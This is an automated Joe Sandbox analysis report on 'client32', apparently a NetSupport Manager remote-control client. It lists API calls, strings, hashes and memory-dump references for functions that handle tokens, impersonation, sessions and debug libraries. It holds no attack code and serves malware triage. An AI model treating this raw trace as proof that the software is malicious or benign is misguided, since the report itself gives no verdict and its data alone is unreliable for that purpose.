Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60

Function 1102EBD0 Relevance: 252.2, APIs: 32, Strings: 111, Instructions: 1967windowthreadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

GetSystemMetrics.USER32(00002000), ref: 1102ED54
FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15

Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2

GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F

Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59

SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
CloseHandle.KERNEL32(00000000), ref: 1102EFF0
FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
LoadIconA.USER32(11000000,000004C1), ref: 1102F521
LoadIconA.USER32(11000000,000004C2), ref: 1102F531
DestroyCursor.USER32(00000000), ref: 1102F557
DestroyCursor.USER32(00000000), ref: 1102F568

Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3

GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
DispatchMessageA.USER32(?), ref: 11030136
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
CloseHandle.KERNEL32(00000000,Function_000278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
SetWindowPos.USER32(0002045A,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

wsprintfA.USER32 ref: 11030645

Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0BAD89F8,?,?,00000000), ref: 1112909A
Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE

Strings

Windows 2003 x64, xrefs: 1102FD18
IsILS returned %d, isvistaservice %d, xrefs: 1102F23E
client32, xrefs: 1102F15E, 1102F367, 1102F46E
DisableHelp, xrefs: 1102F9D5
closed ok, xrefs: 1102EFE2
LSPloaded=%d, WFPloaded=%d, xrefs: 1102F66E
124406, xrefs: 1103022D, 11030280, 110302BB, 11030398
*PriorityClass, xrefs: 110303FC
Unsupported Platform, xrefs: 1102F445
Windows XP, xrefs: 1102FC89
Session shutting down, exiting..., xrefs: 1102ED5E
General, xrefs: 1102F5EC, 1102F6B9, 1102FA1F, 1102FA52
NoFTWhenLoggedOff, xrefs: 1102F9BD
Audio, xrefs: 1102F758, 1102FB27
AssertTimeout, xrefs: 1102F5E7
*ListenPort, xrefs: 1103073E
Error. Wrong hardware. Terminating, xrefs: 1102F26D, 1102F430
TCPIP, xrefs: 11030743
Windows 7, xrefs: 1102FE19
Windows 2008 x64, xrefs: 1102FDE2
istaService, xrefs: 1102EC6B
_debug, xrefs: 110300AF
Windows 2012 R2, xrefs: 1102FF3E
Windows XP Ding.wav, xrefs: 1102FA89
Info. Trying to close client, xrefs: 1102EFB8
Global\NSMWClassAdmin, xrefs: 1103063A
Windows 8 x64, xrefs: 1102FE90
Windows 10 x64, xrefs: 1102FF9D
View, xrefs: 1102F050, 1102F5A5, 1102F5BE, 1102F5D9
NSA.LIC, xrefs: 1102F086
Windows 2003, xrefs: 1102FCB0
NSTWControl32, xrefs: 110307EA
RestartAfterError, xrefs: 1102F6B4
CLIENT32.CPP, xrefs: 1102ED9A, 1102F380
ShowKBEnable, xrefs: 1102F85D
Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s), xrefs: 110309E6
NSMWControl32, xrefs: 11030792
*BeepSound, xrefs: 1102FA4D
Windows 98, xrefs: 1102FB9B
DisableRunplugin, xrefs: 1102F7C1
DisableJoinClass, xrefs: 1102F88F, 1102F92D
MiniDumpType, xrefs: 1102F605
EnableGradientCaptions, xrefs: 1102F5A0, 1102F5B9, 1102F5D4
IKS.LIC, xrefs: 1102F096, 1102F09D, 1102F0C0
Intel(r), xrefs: 1102F30C
Windows 8.1 x64, xrefs: 1102FF12
Default, xrefs: 1103078B, 110307BA, 110307E3
NSMWClass, xrefs: 1102ED16, 1102EEF7, 1102EFF8, 1103062F
Bridge, xrefs: 1102F038
Windows NT, xrefs: 1102FC2E
DisableRequestHelp, xrefs: 1102F8BF, 1102F95D
Info. Client already running, pid=%d (x%x), xrefs: 1102EF56
Ready, xrefs: 11030801
*StartupDelay, xrefs: 110300CC
istaUI, xrefs: 1102EC86
Windows Vista, xrefs: 1102FD4F
EnableSmartcardLogon, xrefs: 11030533
DisableJournal, xrefs: 1102F8D7, 1102F975
_debug, xrefs: 1102F4C6, 1102F60A, 110306A4
TracePriv, xrefs: 110300AA
cl32main, xrefs: 1102EC03
IsJPIK returned %d, isvistaservice %d, xrefs: 1102F3FD
NeedsReinstall, xrefs: 1102F690
pcicl32, xrefs: 1102EEE4
DisableAudioFilter, xrefs: 1102F753, 1102FB22
AlwaysOnTop, xrefs: 11030423
*BeepUsingSpeaker, xrefs: 1102FA1A
UseLegacyPrintCapture, xrefs: 1102FAE6
\Explorer.exe, xrefs: 1103099D
Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s), xrefs: 11030A84
win8ui, xrefs: 1102F4C1
Windows 2012, xrefs: 1102FEC1
NSMWClassVista, xrefs: 1102ED05
NSM.LIC, xrefs: 1102F078, 1102F11A
DisableTSAdmin, xrefs: 1102F702
Windows 7 x64, xrefs: 1102FE3A
Error x%x reading nsm.lic, sesh=%d, xrefs: 1102F0E8
NSSWControl32, xrefs: 110307C1
V12.00.20, xrefs: 1103002D
V12.10.20, xrefs: 11030034, 11030068
Windows 2016, xrefs: 1102FFD4
hClientRunning = %x, pid=%d (x%x), xrefs: 1102F025
Windows XP x64, xrefs: 1102FCDF
JPK, xrefs: 1102F2D5, 1102F39B
Windows 8.1, xrefs: 1102FEEF
Windows 10, xrefs: 1102FF6D
Windows Ding.wav, xrefs: 1102FA82
DisableAudio, xrefs: 1102F71A, 1102F73B, 1102F7A9, 1102F907, 1102F9A5
Windows 95, xrefs: 1102FB6A
CabinetWClass, xrefs: 110308F7
Windows 8, xrefs: 1102FE68
Windows 2008, xrefs: 1102FDB6
Error. Could not load transports - perhaps another client is running, xrefs: 110302F7
Windows Vista x64, xrefs: 1102FD7D
Windows CE, xrefs: 1102FFFF
DisableJournalMenu, xrefs: 1102F8EF, 1102F98D
DisableConsoleClient, xrefs: 1102F6EA, 1102F77F
Intel error "%s", xrefs: 1102F322
ScreenScrape, xrefs: 1102F7D9, 1102F803, 1102F82D
OS2, xrefs: 1102FC0D
Info. Client running as user=%s, type=%d, xrefs: 1102EFA6
TraceIPC, xrefs: 1103069F
Windows Millennium, xrefs: 1102FBCB
UseNTSecurity, xrefs: 1103054E
UseIPC, xrefs: 1103066C
Windows 2000, xrefs: 1102FC5B
gClient.hNotifyEvent, xrefs: 1102ED9F
Client, xrefs: 1102F044, 1102F695, 1102F71F, 1102F740, 1102F7AE, 1102F7C6, 1102F7DE, 1102F808, 1102F832, 1102F862, 1102F894, 1102F8AC, 1102F8C4, 1102F8DC, 1102F8F4, 1102F90C, 1102F932, 1102F94A, 1102F962, 1102F97A, 1102F992, 1102F9AA, 1102F9C2, 1102F9DA, 1102FAEB, 110300D1, 1103017C, 110301C5, 1103038E, 110303E5, 11030401, 11030428, 11030538, 11030553, 11030574, 11030671
EnableSmartcardAuth, xrefs: 1103056F
DisableReplayMenu, xrefs: 1102F8A7, 1102F945
*ScreenScrape, xrefs: 11030177, 110301C0, 110303E0

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$124406$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
API String ID: 372548862-3590453207
Opcode ID: ff6231982a083b7ef807ca73d3ddae56e174acd57833a54bc83ec0c4d0681142
Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
Opcode Fuzzy Hash: ff6231982a083b7ef807ca73d3ddae56e174acd57833a54bc83ec0c4d0681142
Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56

Function 1102E0D0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ListenPort, xrefs: 1102E4D0
client32, xrefs: 1102E3F5
Error x%x reading %s, sesh=%d, xrefs: 1102E381
TSMode, xrefs: 1102E4B0
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102E5C4
%session%, xrefs: 1102E89A
client32.ini, xrefs: 1102E325
%s.%02d, xrefs: 1102E820
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102E9E0
124406, xrefs: 1102E715, 1102E8DB, 1102E8FF, 1102E90C, 1102E93C, 1102E9B1
, xrefs: 1102E685
client32 dbi %hs, xrefs: 1102E993
18/11/16 11:28:14 V12.10F20, xrefs: 1102E98E
WTSQuerySessionInformationA, xrefs: 1102E56E
ClientName, xrefs: 1102E6B5
screenscrape, xrefs: 1102E4E8
WTSFreeMemory, xrefs: 1102E631
DisableConsoleClient, xrefs: 1102E437
NSM.LIC, xrefs: 1102E0F2
%02d, xrefs: 1102E808
ts macaddr=%s, xrefs: 1102E5EC
TCPIP, xrefs: 1102E4D5
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102E9BA
NSMWClass, xrefs: 1102E2B4
MacAddress, xrefs: 1102E5FF
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102E844, 1102E8C3
Client, xrefs: 1102E4B5, 1102E4ED, 1102E604
$session$, xrefs: 1102E886
%sessionname%, xrefs: 1102E859, 1102E872
Wtsapi32.dll, xrefs: 1102E4FC
Warning: Unexpanded clientname=<%s>, xrefs: 1102E7C3
IsA(), xrefs: 1102E849, 1102E8C8

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _malloc_memsetwsprintf
String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$124406$18/11/16 11:28:14 V12.10F20$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 3802068140-2942280555
Opcode ID: eeddba07d7e6520cef25e5c7574d70c0732ba69d7c4c0694e1ffbbd3a2b399ab
Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
Opcode Fuzzy Hash: eeddba07d7e6520cef25e5c7574d70c0732ba69d7c4c0694e1ffbbd3a2b399ab
Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51

Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,771B23A0), ref: 11144173
LoadLibraryA.KERNEL32(?), ref: 111441BC
LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
GetModuleHandleA.KERNEL32(?), ref: 111441EA
GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

Strings

DBGHELP.DLL, xrefs: 111441CF, 111441D4
SymInitialize, xrefs: 11144261
SymSetOptions, xrefs: 11144277
SymGetSymFromAddr, xrefs: 1114428D
SymGetLinePrev, xrefs: 1114422A
dbghelp.dll, xrefs: 11144198
MiniDumpWriteDump, xrefs: 111442A3
SymFunctionTableAccess, xrefs: 11144298
StackWalk, xrefs: 11144243
SymMatchFileName, xrefs: 11144235
SymGetLineFromAddr, xrefs: 111441F8
SymCleanup, xrefs: 1114424B
SymGetLineNext, xrefs: 1114421F
IMAGEHLP.DLL, xrefs: 111441DE, 111441E3, 111441E9
SymLoadModule, xrefs: 11144256
SymGetModuleInfo, xrefs: 11144282
SymGetOptions, xrefs: 1114426C
SymGetLineFromName, xrefs: 11144217

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
API String ID: 3874234733-2061581830
Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59

Function 110AA170 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(setupapi.dll,0BAD89F8,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA1A3
GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF), ref: 110AA1E1
GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
_free.LIBCMT ref: 110AA240
GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
GetLastError.KERNEL32 ref: 110AA27D
_malloc.LIBCMT ref: 110AA293
GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA2E7
SetLastError.KERNEL32(00000078), ref: 110AA2FB
GetLastError.KERNEL32 ref: 110AA301
_free.LIBCMT ref: 110AA313
SetLastError.KERNEL32(00000078), ref: 110AA324
SetLastError.KERNEL32(00000078), ref: 110AA331
_free.LIBCMT ref: 110AA344
FreeLibrary.KERNEL32(?,?), ref: 110AA354
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA3F8

Strings

SetupDiEnumDeviceInterfaces, xrefs: 110AA206
SetupDiGetDeviceInterfaceDetailA, xrefs: 110AA24C, 110AA2AF
SetupDiDestroyDeviceInfoList, xrefs: 110AA3A0
SetupDiGetClassDevsA, xrefs: 110AA1BB
setupapi.dll, xrefs: 110AA19B

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
API String ID: 3464732724-3340099623
Opcode ID: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
Instruction ID: 5c4fa76f58df98f84a8804f3b2f927c1121c913996f050c4ed1f836ab53a5840
Opcode Fuzzy Hash: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
Instruction Fuzzy Hash: CE818472D40219EBEB04DFE4ED88F9EBBB8AF44704F104528F922A76C4DB759945CB50

Function 11134830 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278
libraryloadertimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,0BAD89F8), ref: 1113489E
LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
GetCurrentProcess.KERNEL32 ref: 11134937
GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
SetLastError.KERNEL32(00000078), ref: 11134978
GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
SetLastError.KERNEL32(00000078), ref: 111349D9
SetLastError.KERNEL32(00000078), ref: 111349E6
GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
